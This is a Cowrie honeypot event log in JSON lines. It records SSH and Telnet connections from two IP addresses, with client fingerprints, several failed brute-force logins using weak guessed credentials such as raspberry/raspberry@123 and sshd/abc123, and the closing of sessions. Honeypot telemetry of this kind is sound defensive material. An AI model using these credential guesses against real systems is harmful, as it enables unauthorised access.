{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35590,"dst_ip":"1.2.3.4","dst_port":22,"session":"020dc4ddb52c","protocol":"ssh","message":"New connection: 212.227.235.229:35590 (1.2.3.4:22) [session: 020dc4ddb52c]","sensor":"my-vps","timestamp":"2025-09-09T02:09:16.412699Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:09:16.414109Z","src_ip":"212.227.235.229","session":"020dc4ddb52c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:09:16.681931Z","src_ip":"212.227.235.229","session":"020dc4ddb52c"}
{"eventid":"cowrie.login.failed","username":"sshd","password":"abc123","message":"login attempt [sshd/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T02:09:17.737591Z","src_ip":"212.227.235.229","session":"020dc4ddb52c"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:09:18.997757Z","src_ip":"212.227.235.229","session":"020dc4ddb52c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34832,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a0da112675c","protocol":"ssh","message":"New connection: 212.227.235.229:34832 (1.2.3.4:22) [session: 2a0da112675c]","sensor":"my-vps","timestamp":"2025-09-09T02:09:23.651502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:09:23.668938Z","src_ip":"212.227.235.229","session":"2a0da112675c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:09:23.928965Z","src_ip":"212.227.235.229","session":"2a0da112675c"}
{"eventid":"cowrie.login.failed","username":"superman","password":"qwerty","message":"login attempt [superman/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T02:09:24.973493Z","src_ip":"212.227.235.229","session":"2a0da112675c"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:09:27.039187Z","src_ip":"212.227.235.229","session":"2a0da112675c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38874,"dst_ip":"1.2.3.4","dst_port":22,"session":"cdaf8e39d9d1","protocol":"ssh","message":"New connection: 212.227.235.229:38874 (1.2.3.4:22) [session: cdaf8e39d9d1]","sensor":"my-vps","timestamp":"2025-09-09T02:09:33.381619Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:09:33.382243Z","src_ip":"212.227.235.229","session":"cdaf8e39d9d1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:09:33.489917Z","src_ip":"212.227.235.229","session":"cdaf8e39d9d1"}
{"eventid":"cowrie.login.failed","username":"ahmad","password":"12345678","message":"login attempt [ahmad/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T02:09:33.962179Z","src_ip":"212.227.235.229","session":"cdaf8e39d9d1"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:09:35.073545Z","src_ip":"212.227.235.229","session":"cdaf8e39d9d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57524,"dst_ip":"1.2.3.4","dst_port":22,"session":"31a7f7976a87","protocol":"ssh","message":"New connection: 212.227.235.229:57524 (1.2.3.4:22) [session: 31a7f7976a87]","sensor":"my-vps","timestamp":"2025-09-09T02:09:42.921094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:09:42.929997Z","src_ip":"212.227.235.229","session":"31a7f7976a87"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:09:43.309350Z","src_ip":"212.227.235.229","session":"31a7f7976a87"}
{"eventid":"cowrie.login.failed","username":"mos","password":"12345678","message":"login attempt [mos/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T02:09:44.839675Z","src_ip":"212.227.235.229","session":"31a7f7976a87"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:09:46.225871Z","src_ip":"212.227.235.229","session":"31a7f7976a87"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32986,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ca0d5fe9a9c","protocol":"ssh","message":"New connection: 212.227.235.229:32986 (1.2.3.4:22) [session: 8ca0d5fe9a9c]","sensor":"my-vps","timestamp":"2025-09-09T02:09:52.296465Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:09:52.297482Z","src_ip":"212.227.235.229","session":"8ca0d5fe9a9c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:09:52.597378Z","src_ip":"212.227.235.229","session":"8ca0d5fe9a9c"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T02:09:53.835769Z","src_ip":"212.227.235.229","session":"8ca0d5fe9a9c"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:09:55.138466Z","src_ip":"212.227.235.229","session":"8ca0d5fe9a9c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46914,"dst_ip":"1.2.3.4","dst_port":22,"session":"cec3396d94c1","protocol":"ssh","message":"New connection: 212.227.235.229:46914 (1.2.3.4:22) [session: cec3396d94c1]","sensor":"my-vps","timestamp":"2025-09-09T02:10:09.112630Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:10:09.113705Z","src_ip":"212.227.235.229","session":"cec3396d94c1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:10:09.199759Z","src_ip":"212.227.235.229","session":"cec3396d94c1"}
{"eventid":"cowrie.login.failed","username":"acer","password":"acer","message":"login attempt [acer/acer] failed","sensor":"my-vps","timestamp":"2025-09-09T02:10:09.590480Z","src_ip":"212.227.235.229","session":"cec3396d94c1"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:10:10.680743Z","src_ip":"212.227.235.229","session":"cec3396d94c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37743,"dst_ip":"1.2.3.4","dst_port":23,"session":"3004d1c98478","protocol":"telnet","message":"New connection: 212.227.125.160:37743 (1.2.3.4:23) [session: 3004d1c98478]","sensor":"my-vps","timestamp":"2025-09-09T02:10:55.947956Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44902,"dst_ip":"1.2.3.4","dst_port":22,"session":"33a13bde7012","protocol":"ssh","message":"New connection: 212.227.235.229:44902 (1.2.3.4:22) [session: 33a13bde7012]","sensor":"my-vps","timestamp":"2025-09-09T02:10:57.519801Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:10:57.520476Z","src_ip":"212.227.235.229","session":"33a13bde7012"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:10:57.608939Z","src_ip":"212.227.125.160","session":"36d2b33ac774"}
{"eventid":"cowrie.session.closed","duration":180.14098238945007,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:10:57.614011Z","src_ip":"212.227.125.160","session":"36d2b33ac774"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:11:00.591844Z","src_ip":"212.227.235.229","session":"33a13bde7012"}
{"eventid":"cowrie.login.failed","username":"raspberry","password":"raspberry@123","message":"login attempt [raspberry/raspberry@123] failed","sensor":"my-vps","timestamp":"2025-09-09T02:11:01.915261Z","src_ip":"212.227.235.229","session":"33a13bde7012"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:11:03.151276Z","src_ip":"212.227.235.229","session":"33a13bde7012"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53734,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c0d29aab58f","protocol":"ssh","message":"New connection: 212.227.235.229:53734 (1.2.3.4:22) [session: 2c0d29aab58f]","sensor":"my-vps","timestamp":"2025-09-09T02:11:04.275720Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:11:04.276903Z","src_ip":"212.227.235.229","session":"2c0d29aab58f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:11:04.366861Z","src_ip":"212.227.235.229","session":"2c0d29aab58f"}
{"eventid":"cowrie.login.failed","username":"dolphins","password":"dolphins2025","message":"login attempt [dolphins/dolphins2025] failed","sensor":"my-vps","timestamp":"2025-09-09T02:11:04.763849Z","src_ip":"212.227.235.229","session":"2c0d29aab58f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:11:05.854018Z","src_ip":"212.227.235.229","session":"2c0d29aab58f"}
{"eventid":"cowrie.session.closed","duration":12.601601123809814,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:11:08.549486Z","src_ip":"212.227.125.160","session":"3004d1c98478"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38041,"dst_ip":"1.2.3.4","dst_port":23,"session":"c84937e4d66c","protocol":"telnet","message":"New connection: 212.227.125.160:38041 (1.2.3.4:23) [session: c84937e4d66c]","sensor":"my-vps","timestamp":"2025-09-09T02:11:08.752035Z"}
{"eventid":"cowrie.session.closed","duration":12.782032489776611,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:11:21.533997Z","src_ip":"212.227.125.160","session":"c84937e4d66c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38336,"dst_ip":"1.2.3.4","dst_port":23,"session":"1e2b76f0d94f","protocol":"telnet","message":"New connection: 212.227.125.160:38336 (1.2.3.4:23) [session: 1e2b76f0d94f]","sensor":"my-vps","timestamp":"2025-09-09T02:11:21.746265Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48250,"dst_ip":"1.2.3.4","dst_port":22,"session":"29cee871850b","protocol":"ssh","message":"New connection: 212.227.235.229:48250 (1.2.3.4:22) [session: 29cee871850b]","sensor":"my-vps","timestamp":"2025-09-09T02:11:21.969654Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:11:21.971360Z","src_ip":"212.227.235.229","session":"29cee871850b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:11:22.080995Z","src_ip":"212.227.235.229","session":"29cee871850b"}
{"eventid":"cowrie.login.failed","username":"tests","password":"tests123","message":"login attempt [tests/tests123] failed","sensor":"my-vps","timestamp":"2025-09-09T02:11:22.554765Z","src_ip":"212.227.235.229","session":"29cee871850b"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:11:23.665533Z","src_ip":"212.227.235.229","session":"29cee871850b"}
{"eventid":"cowrie.session.closed","duration":12.81455111503601,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:11:34.560715Z","src_ip":"212.227.125.160","session":"1e2b76f0d94f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38658,"dst_ip":"1.2.3.4","dst_port":23,"session":"de9f3f69ff37","protocol":"telnet","message":"New connection: 212.227.125.160:38658 (1.2.3.4:23) [session: de9f3f69ff37]","sensor":"my-vps","timestamp":"2025-09-09T02:11:34.768169Z"}
{"eventid":"cowrie.session.closed","duration":12.786711692810059,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:11:47.554786Z","src_ip":"212.227.125.160","session":"de9f3f69ff37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38970,"dst_ip":"1.2.3.4","dst_port":23,"session":"2e759f925611","protocol":"telnet","message":"New connection: 212.227.125.160:38970 (1.2.3.4:23) [session: 2e759f925611]","sensor":"my-vps","timestamp":"2025-09-09T02:11:47.764738Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42876,"dst_ip":"1.2.3.4","dst_port":22,"session":"254b3f2b0f18","protocol":"ssh","message":"New connection: 212.227.235.229:42876 (1.2.3.4:22) [session: 254b3f2b0f18]","sensor":"my-vps","timestamp":"2025-09-09T02:11:49.169865Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:11:49.171072Z","src_ip":"212.227.235.229","session":"254b3f2b0f18"}
